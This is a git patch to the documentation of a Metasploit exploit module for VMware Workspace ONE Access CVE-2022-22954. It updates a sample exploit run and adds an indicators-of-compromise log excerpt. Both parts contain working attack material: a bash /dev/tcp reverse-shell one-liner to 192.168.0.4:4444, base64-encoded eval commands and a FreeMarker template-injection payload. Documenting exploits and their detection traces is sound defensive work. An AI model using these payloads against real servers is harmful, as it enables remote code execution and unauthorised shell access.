From 4ea72bb7a7b95c668c60cd7c8d94028f0723b691 Mon Sep 17 00:00:00 2001
From: William Vu <4551878+wvu@users.noreply.github.com>
Date: Tue, 3 May 2022 02:19:43 -0500
Subject: [PATCH] Add log IOC

---
 ...ware_workspace_one_access_cve_2022_22954.md | 18 ++++++++++++++----
 1 file changed, 14 insertions(+), 4 deletions(-)

diff --git a/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md b/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
index 3cacb857bd..eb3315a42d 100644
--- a/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
+++ b/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
@@ -66,17 +66,27 @@ msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set verbos
 verbose => true
 msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > run
 
-[+] bash -c '0<&174-;exec 174<>/dev/tcp/192.168.0.4/4444;sh <&174 >&174 2>&174'
+[+] bash -c '0<&159-;exec 159<>/dev/tcp/192.168.0.4/4444;sh <&159 >&159 2>&159'
 [*] Started reverse TCP handler on 127.0.0.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Executing command: bash -c {eval,$({echo,ZWNobyB5dGdJRGVVaVM=}|{base64,-d})}
+[*] Executing command: bash -c {eval,$({echo,ZWNobyAzUjNQazhpemd6}|{base64,-d})}
 [+] The target is vulnerable.
 [*] Executing cmd/unix/reverse_bash (Unix Command)
-[*] Executing command: bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTM4LTtleGVjIDEzODw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEzOCA+JjEzOCAyPiYxMzgn}|{base64,-d})}
-[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55079) at 2022-05-02 20:17:23 -0500
+[*] Executing command: bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTAxLTtleGVjIDEwMTw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEwMSA+JjEwMSAyPiYxMDEn}|{base64,-d})}
+[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:57862) at 2022-05-03 02:33:24 -0500
 
 id
 uid=1001(horizon) gid=1003(www) groups=1003(www),1001(vfabric),1002(pivotal)
 uname -a
 Linux photon-machine 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021 x86_64 GNU/Linux
 ```
+
+## IOCs
+
+### `/opt/vmware/horizon/workspace/logs/greenbox_web.log`
+
+```
+[snip]
+2022-05-03 07:33:17,988 WARN (Thread-147) [com.vmware.endusercatalog.ui.web.UiApplicationExceptionResolver.resolveException] <GreenBox> <correlation_id: fe10fc5e-ff7d-4a5a-96bf-f2e1b20eb63f> <tenant_id: zt1myh6phvlz> <client_ip: 192.168.0.2> <username: > <device_id: > - Additional error info for requestId fe10fc5e-ff7d-4a5a-96bf-f2e1b20eb63f which resulted in return code 400, mapped to error code auth.context.invalid and, error is: {"code":"auth.context.invalid","message":"Authorization context is not valid. Login request  received with tenant code: zt1myh6phvlz, device id: null, device type: ${\"freemarker.template.utility.Execute\"?new()(\"bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTAxLTtleGVjIDEwMTw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEwMSA+JjEwMSAyPiYxMDEn}|{base64,-d})}\")} and token revoke status: false."}, mapped exception class :class com.vmware.endusercatalog.auth.InvalidAuthContextException
+[snip]
+```